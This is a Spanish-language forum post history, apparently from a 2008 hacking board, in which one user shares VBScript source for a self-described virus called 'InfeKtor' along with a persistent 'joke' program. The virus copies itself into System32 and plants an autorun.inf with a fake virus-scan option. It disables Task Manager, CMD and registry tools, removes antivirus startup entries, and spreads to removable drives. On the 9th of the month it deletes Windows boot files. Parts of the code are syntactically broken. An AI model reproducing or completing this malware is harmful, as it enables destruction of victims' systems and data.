| |
|
81
|
Programación / Scripting / Re: manipulacion de fotos.
|
en: 11 Octubre 2008, 22:36 pm
|
 no estaría de más que redactes una pregunta como debe de ser Me he olvidado la bola de cristal en la casa de un familiar, así que no puedo adivinar nada en este momento   Manipular fotos en que sentido man?? ejecutarlas, copiarlas, moverlas, cambiarles el formato? etc... Tiene que ver con script, veradad.....? SALUD.O.S |
|
|
|
|
82
|
Programación / Scripting / Re: Mi proyecto broma en vbs
|
en: 11 Octubre 2008, 22:32 pm
|
Ahora que lo leo bien.... Me falto copiar el autorun en las unidades extraibles.!! todavia esta en construccion, todos los dias trabajo un poquitito en ellos, si tengo tiempo claro.. SALUD.O.S |
|
|
|
|
83
|
Programación / Scripting / Re: Mi proyecto broma en vbs
|
en: 11 Octubre 2008, 22:28 pm
|
Ahora entiendo porque el problema con el sleep ..... Es que en vbs, si al sleep le pones esperas muy grandes... muere . Es verad jaja pero al exe tambien se lo cierra y listo, fue.. La idea es ponerle el nombre de algu nombre como svchost.exe o winlogon, explorer.exe Es asi nomas, la idea es dejar las mejores funciones para los virus y demas.. tengo tres proyectos: dos virus y una broma.. InfeKtor, V-InfeKtor y K-Joke Este es el del InfeKtor : '-------------------------------------------------------_____##########____-------------------------------------------------
'0111001011011000111010010100000100010001100111011100100\--_--_--_--_--_--/0101011101001010010100100001000100100110001010011
'-------------------------------------------------------/ INFEKTOR 2.4 \-------------------------------------------------
'0101011101001010010100100001000100100110001010011011001\ +--+---+---+--+ /1001011011000111010010100000100010001100111011100
'-------------------------------------------------------/ By: Bakura182 \-------------------------------------------------
'0101100111010111010101011101001110001101010111110100100�������������������0101111101001000101011101000100100110001010010011
'---------------------------------------------------------------------------------------------------------------------------
'Aca defino todas las variables a usar
Dim Batch
Dim InfKFSOvar
Dim CodigoAutoR
Dim InfKWSSvar
Dim EjecChauIniW
Dim i
Dim x
Dim Uni
'Empiezo creando la carpeta que almacenara el virus InfeKtor
On error resume next
Set InfKFSOvar = CreateObject("Scripting.FileSystemObject")
InfKFSOvar.CreateFolder "C:\Windows\System32\InfeKtor"
InfKFSOvar.CreateFolder "C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-"
'Se copia asi mismo
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\InfeKtor.exe"
'Se crea el autorun con las opciones de abrir, explorar y escaneo falso de virus
Set CodigoAutoR = InfKFSOvar.CreateTextFile ("C:\Windows\system32\InfeKtor\BKPlace-182618261826-+BK182+-\Autorun.inf",True)
CodigoAutoR.WriteLine ";oL74j5wcs2rkw2S53jrliraKd6srAw2"
CodigoAutoR.WriteLine "[Autorun]"
CodigoAutoR.WriteLine ";4siapjw4Dss3D80jjs3rKKkw2Al7rDad"
CodigoAutoR.WriteLine "shell\1=Abrir"
CodigoAutoR.WriteLine ";mpaF3AkDI2KK5awial3lK43w4Dl3JesLKrj0iL9DcsSo9waO2349wdlk"
CodigoAutoR.WriteLine "shell\1\command=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";8lkakfo431kip3dsoe2Daw53dqJsDKKcJalJoof70osK43LKfC0UksswlLksZko5jkL5qsK434LiJe2j"
CodigoAutoR.WriteLine "shell\1\default=1"
CodigoAutoR.WriteLine ";d2dwJSaaLa5UO313LKe6kqAdwaajqw9loe5200Ds49LIr8LqXckkKewpAc9oiskk0K4i2arwL30533o4Kdsrajsairwr38al"
CodigoAutoR.WriteLine "Shell\2=Explorar"
CodigoAutoR.WriteLine ";kFaKo4kd33cK4mXKpiLkjwlddw22nwA5k4awLqf08So5jiie23AJa2awkakf28kDp
CodigoAutoR.WriteLine "Shell\2\Command=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";kFaKo4kd33cK4mXKpiLkjwlddw22nwA5k4awLqf08So5ji
CodigoAutoR.WriteLine "Shell\5=Escanear virus"
CodigoAutoR.WriteLine ";oL74j5wcs2rkw2S53jrliraKd6srAw2"
CodigoAutoR.WriteLine "Shell\5\Command=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";d2dwJSaaLa5UO313LKe6kqAdwaajqw9l53REsdSdf3f4gFw692oaA9al"
CodigoAutoR.WriteLine "1=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";4siapjw4Dss3D80jjs3rKKkw2Al7rDad"
CodigoAutoR.WriteLine "2=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";oL74j5wcs2rkw2S53jrliraKd6srAw2"
CodigoAutoR.WriteLine "5=%InfeKtor.exe%"
CodigoAutoR.WriteLine ";4siapjw4Dss3D80jjs3rKKkw2A3Rsa3L"
CodigoAutoR.Close
'Se crea un bat que le a�ade atributos al virus y demas y que se los saca a otros.. jeje
'Volviendolos visibles para usuarios inexpertos y lograr asi que se autodestruyan el inicio de W
'sino a esperar hasta el nueve como mas abajo se vera
Set Batch = InfKFSOvar.CreateTextFile ("C:\Windows\system32\InfeKtor\BKPlace-182618261826-+BK182+-\Attribs.bat",True)
Batch.WriteLine "@echo off"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\Autorun.inf"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\InfeKtor.exe"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-"
Batch.WriteLine "attrib +h +r +s C:\Windows\System32\InfeKtor"
Batch.WriteLine "attrib -h -r -s C:\IO.sys"
Batch.WriteLine "attrib -h -r -s C:\COMAND.com
Batch.WriteLine "attrib -h -r -s C:\NTDETECT.bat"
Batch.WriteLine "attrib -h -r -s C:\boot.ini"
Batch.WriteLine "attrib -h -r -s C:\MSDOS.sys"
Batch.WriteLine "attrib -h -r -s C:\bootfont.bin"
Batch.WriteLine "attrib -h -r -s C:\ntldr.sys"
Batch.WriteLine "attrib -h -r -s C:\pagefile.sys"
Batch.WriteLine "attrib -h -r -s C:\IO.sys "
Batch.WriteLine "attrib -h -r -s C:\AUTOEXEC.bat"
Batch.WriteLine "attrib -h -r -s C:\CONFIG.sys"
Batch.WriteLine "attrib -h -r -s C:\Windows\WIN.ini
Batch.WriteLine "attrib -h -r -s C:\Windows\SYSTEM.ini
Batch.WriteLine "attrib -a -h -r -s C:\Config.Msi"
Batch.WriteLine "attrib -a -h -r -s C:\RECYCLER"
Batch.WriteLine "attrib -a -h -r -s C:\System Volume Information"
Batch.WriteLine "exit"
Batch.close
'tengo que pasarlo a VBS mejor, no conviene ejecutar un bat ya que saltaria la consola y es muy llamativa..
'Ejecuto el bat
Set InfKWSSvar = CreateObject("WScript.Shell")
InfKWSSvar.Run "C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\Attribs.bat"
'Y lo borro, ya que es muy facil editarlo y hacer lo contrario... ��'
InfKFSOvar.DeleteFile "C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\Attribs.bat"
'Se guarda en el registro y otras opciones
InfKWSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb","C:\Windows\System32\InfeKtor\BKPlace-182618261826-+BK182+-\InfeKtor.exe"
InfKWSSvar.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SearchHidden",0,"REG_DWORD")
InfKWSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD")
InfKWSSvar.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD",2,"REG_DWORD")
InfKWSSvar.RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden",1,"REG_DWORD")
InfKWSSvar.regwrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1")
InfKWSSvar.regwrite ("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD")
InfKWSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD")
InfKWSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD")
'Aca quiero agregar la mayor cantidad de AV para que no se inicien, solo llevo dos =( ..
InfKWSSvar.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\NAV Agent"
InfKWSSvar.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\kav"
'Si el dia es distinto a 9 entonces procede a crear una copia de si mismo con un nombre diferente, sino borra los archivos de arranque de windows, sin ellos windows no arranca
if Day(Now()) <> 9 then
Wscript.sleep 10000
Randomize
Azar = Int(Rnd * 10)
If Azar = "0" Then Nombre = "Password Generator"
If Azar = "1" Then Nombre = "Install K-raoke"
If Azar = "2" Then Nombre = "SysUtils"
If Azar = "3" Then Nombre = "UnistallerX"
If Azar = "4" Then Nombre = "Mk2"
If Azar = "5" Then Nombre = ""
If Azar = "6" Then Nombre = "Messenger error"
If Azar = "7" Then Nombre = "Iexplorer"
If Azar = "8" Then Nombre = "Abu"
If Azar = "9" Then Nombre = "EasyWeb"
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Windows\Documents and settings\Mis documentos" & Nombre & ".exe"
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Windows\Documents and settings\Adminstrador\Escritorio" & Nombre & ".exe"
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Documents and Settings\All Users\Escritorio
InfKFSOvar.CopyFile ".\InfeKtor.exe","C:\Documents and Settings\Usuario\Escritorio"," & Nombre & ".exe"
'Tendria que crear algo que despues ejecute a cualquiera de ellos, sino es en vano jaja
else
On error resume next
InfKFSOvar.DeleteFile "C:\IO.sys"
InfKFSOvar.DeleteFile "C:\AUTOEXEC.bat"
InfKFSOvar.DeleteFile "C:\CONFIG.sys"
InfKFSOvar.DeleteFile "C:\COMAND.com"
InfKFSOvar.DeleteFile "C:\NTDETECT.bat"
InfKFSOvar.DeleteFile "C:\Windows\WIN.ini"
InfKFSOvar.DeleteFile "C:\boot.ini"
InfKFSOvar.DeleteFile "C:\MSDOS.sys"
InfKFSOvar.DeleteFile "C:\bootfont.bin"
InfKFSOvar.DeleteFile "C:\ntldr.sys"
InfKFSOvar.DeleteFile "C:\pagefile.sys"
InfKFSOvar.DeleteFile "C:\Windows\SYSTEM.ini"
InfKFSOvar.DeleteFolder "C:\Config.Msi"
InfKFSOvar.DeleteFolder "C:\RECYCLER"
InfKFSOvar.DeleteFolder "C:\System Volume Information".DeleteFile "C:\IO.sys"
End if
'Crea otro bat que apaga el ordenador y avisa que ha sido victima del infeKtor (tarde el aviso pero bueh,ja)
Set ChauIniW = InfKFSOvar.CreateTextFile ".\Salud.o.s.bat,True"
ChauIniW.Writeline "@echo off"
ChauIniW.Writeline "Shutdown -s -t 5 -c Has_Sido_Victima_Del_InfeKtor..."
ChauIniW.Writeline "Exit"
ChauIniW.Close
Set EjecChauIniW = CreateObject("WScript.Shell")
EjecChauIniW.Run ".\Salud.o.s.bat"
End if
'Propagacion por unidades
' he aqui el ejemplo tuyo de propagacion
Set FSOvar = createobject("scripting.filesystemobject")
Set uni = FSOvar.drives
For each x in uni
If x.driveletter <> "A" and x.drivetype = 1 then
FSOvar.copyfile wscript.scriptfullname, x.driveletter &":\"
msgbox "contagio en " & x.driveletter
End If
Next Debo remplazar el bat por codigo en vbs , con los atributos en 39, pero lo hago despues, estoy muy ocupado con el estudio jaja SALUD.O.S |
|
|
|
|
84
|
Programación / Scripting / Mi proyecto broma en vbs
|
en: 11 Octubre 2008, 22:03 pm
|
Buenas, aca dejando el source de una simple broma en vbs que consta en ejecutar en pantalla el block de notas y escribir en el que esta infectado,etc (Ustedes son libres de moficarlo), es bastante molesto andar cerrando el block cada 1 minuto.. Las personas con menos conocimientos creeran que es alguna clase de virus o troyano que lo ha infectado.  Buena aca el code, es bastante simple : Private Sub Form_Load()
'Declaro algunas variables
Dim Molesto
Dim WSSvar
Dim i
Dim FSOvar
On Error Resume Next
Set WSSvar = CreateObject("wscript.shell")
WSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"
'Se agrega al regsitro
WSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe"
'En este tambien, deben dejar solo uno, es opcional
Set FSOvar = CreateObject("Scripting.FileSystemObject")
FSOvar.CopyFile ".\SexDonkey.exe", "C:\Windows\System32\K-Joke.exe"
' Se copia asi mismo, en la ruta donde sera buscado luego en el registro
Do
Wscript.sleep 70000
' No hara nada por 1,10 minutos y despues ejecuta el block de notas
Set Molesto = WSSvar.exec("Notepad.exe")
Wscript.sleep 1500 ' Le da tiempo al notepad para que se termine de abrir
WSSvar.AppActivate Molesto.processid
' Esto hara que coloque las palabras sobre el block de notas
Wscript.sleep 700 'Esto es para asegurarse de que lo hara sobre el
WSSvar.AppActivate Molesto.processid
'Envia pulsaciones de teclado que se escribiran sobre el notepad.
'ustedes pueden escribir lo que quieran que les aparecera, como dice ahi.
WSSvar.SendKeys "Has sido infeKtado por mi V-InfeKtor"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "Eliminame si puedes..."
WSSvar.SendKeys "{ENTER}"
Wscript.sleep 670
WSSvar.SendKeys ".___"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |\ # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# | | # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |/ # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# # # &"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "##=/ #@"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# .-# # &"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |\ # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# | | # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# |/ # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "# # # #"
WSSvar.SendKeys "{ENTER}"
WSSvar.SendKeys "#0oo./ # #"
Loop 'Se repite nuevamente
End Sub
pueden hacer este agregado si quieren o bien cambiarlo por: Dim WSSvar
Set WSSvar = CreateObject("wscript.shell")
WSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\systemb", "C:\Windows\System32\K-Joke.exe" pero en caso de agregarlo se iniciarian dos.. jaja no se pregunten porque tiene ese nombre "sexDonkey" voy a seguir trabajando en el, espero que quede bueno. SALUD.O.S |
|
|
|
|
85
|
Programación / Programación Visual Basic / Re: Mi programa vb en resgistro.
|
en: 11 Octubre 2008, 21:30 pm
|
... Es que queria pasarlo de VBS a VB, porque veo que los script son faciles de sacar y por el solo hecho de poder guardarlo en EXE; con los exe se puede jugar un poco mas  Ahora posteare en scripting el source de una broma que estoy programando en VBS que pase a VB (sin la funcion Wscript.sleep ).. la dejare para que me ayuden.. o ayudes porque veo que eres el unico que responde.. de todas maneras igual posteare la misma pregunta en scripting. SALUD.O.S |
|
|
|
|
86
|
Programación / Programación Visual Basic / Re: Mi programa vb en resgistro.
|
en: 11 Octubre 2008, 21:19 pm
|
Bastante completo tu ejemplo ssccaann43  Aprovechando el hilo de la conversacion, como hago un temporizador que no sea el tipico Dim i
i = 1
do until i = 100000
i = i + 1
end if
loop se que el Wscript.sleep no funciona porque lo he intentado pero no funciona.. hay?? Gracias de antemano SALUD.O.S |
|
|
|
|
87
|
Programación / Programación Visual Basic / Re: Mi programa vb en resgistro.
|
en: 11 Octubre 2008, 17:56 pm
|
¿como hago para que el usuario de mi programa le de a un botón y al apretarlo
el programa cada vez que inicie sesión de windows se ejecute?
Espero que esto te sirva : Dim WSSvar
Set WSSvar = CreateObject("wscript.shell")
WSSvar.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\NOMBRE", "RUTA_DE_TU_ARCHIVO\nombrearchivo.exe"
WSSvar.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\NOMBRE", "RUTA_DE_TU_ARCHIVO\nombrearchivo.exe" Es una entrada en HKCU y otra en HKLM, es en vbs pero igual sirve para VB.. Si lo que quieres hacer es asignar un boton que haga que tu programa se inicie con windows solo debes colocar un boton y agregar eso.. obviamente editando donde dice NOMBRE y etc.. ¬¬' SALUD.O.S |
|
|
|
|
88
|
Programación / Scripting / Reconocer unidades extraibles
|
en: 11 Octubre 2008, 16:08 pm
|
Buenas tardes, Me pregunto como es el script correcto para reconocer si hay una o unas unidades extraibles como pendrive, hd externos, tarjetas, etc... he hecho este codigo pero no me funciona.. : Dim FSOvar
Dim Uni
Set FSOvar = createobject("scripting.filesystemobject")
Set Uni = FSOvar.drives
For each x in Uni do
L = x.Drivesletter
if L = true then Objfso.copyfile ".\archivo.vbs",&L&":\"
msgBox "contagio en " &L&
exit do
End if
next Esta bien asi.??  He intendao varios codigos pero creo que este es el mas estable.. Si funcionara... Si alguien puede ayudarme se lo agradeceria.. SALUD.O.S |
|
|
|
|
90
|
Programación / Scripting / Re: Compilar codigo vbs en un exe en VB6
|
en: 3 Octubre 2008, 19:26 pm
|
.. Se que voy bien... He inten... como exe un ejemplo de reproduccion en los pen-drives o cualquier unidad, es una pavada, si quieren lo posteo. es un ejemplo mediocre pero actualmente esta bastante bien. Ese ejemplo estaba en mi pendrive, mi virus tambien lo tiene pero de la manera mas correcta , El proyecto esta en mi casa. Gracias por el manual, todo es bienvenido; pero esa es la unica forma de reproduccion que se me ocurre. que se copie asi mismo constantemente en todas las unidades. Mas tarde o mañana te subo el codigo completo, para que me ayudes listo man? Es que no tengo internet y estoy en la escuela; uso el internet de la escula o voy a la casa de una amiga, por eso tardo en resp. SALUD.O.S |
|
|
|
|
|
| |
|
Mostrar Mensajes